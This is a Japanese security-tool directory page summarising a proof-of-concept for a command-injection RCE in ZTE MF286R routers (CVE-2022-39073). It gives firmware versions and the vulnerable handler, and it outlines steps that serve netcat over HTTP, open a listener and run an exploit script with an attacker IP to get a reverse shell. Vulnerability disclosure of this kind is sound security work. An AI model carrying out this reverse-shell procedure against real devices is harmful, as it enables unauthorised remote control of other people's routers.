Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-39073 — ZTE MF286R ルーターに影響するコマンドインジェクションの脆弱性の概念実証コード。RCE エクスプロイトを含みます。 | Kitploit
ツール/GitHubGitHub/v0lp3/cve-2022-39073
IoTセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールリモートアクセスツール
GitHubv0lp3/cve-2022-39073

CVE-2022-39073

ZTE MF286R ルーターに影響するコマンドインジェクションの脆弱性の概念実証コード。RCE エクスプロイトを含みます。

リポジトリを見る
1143年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-39073

ファームウェア情報:

root@kitploit:~
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10

前提条件

  • requests (pip install requests)

コマンドインジェクション

この脆弱性は、zte_net_link_detect バイナリと、Webサーバー goahead バイナリ内の WATCH_DOG_SWITCH ハンドラとの間で共有されるコマンドインジェクションです。

この脆弱性は、ルーターがWANに接続されているか、SIMカードを介してインターネットに接続されている場合にのみ悪用可能であることに注意してください。(ppp_status キーの値は ppp_connected、ipv4_ipv6_connected、ipv6_connected のいずれかである必要があります)。

リスク

  • リモートコード実行 (RCE)
  • 任意のコマンド実行

概念実証

このエクスプロイトのアイデアは、HTTPサーバーから netcat の静的バイナリをダウンロードし、それを使ってリバースシェルを開くことです。 補足: このフォルダに含まれる netcat はビッグエンディアンです。

  • このディレクトリでHTTPサーバーを起動します python3 -m http.server 8080
  • ポート 9999 でリスニングソケットを開きます nc -lvp 9999
  • このフォルダのスクリプトを実行します python3 exploit.py http://<router> <admin_password> <attacker_ip, es: 192.168.1.101>

参考情報

この脆弱性は、Andrea Maugeri 氏によって2022年9月に報告されました。 https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664

ツールをダウンロード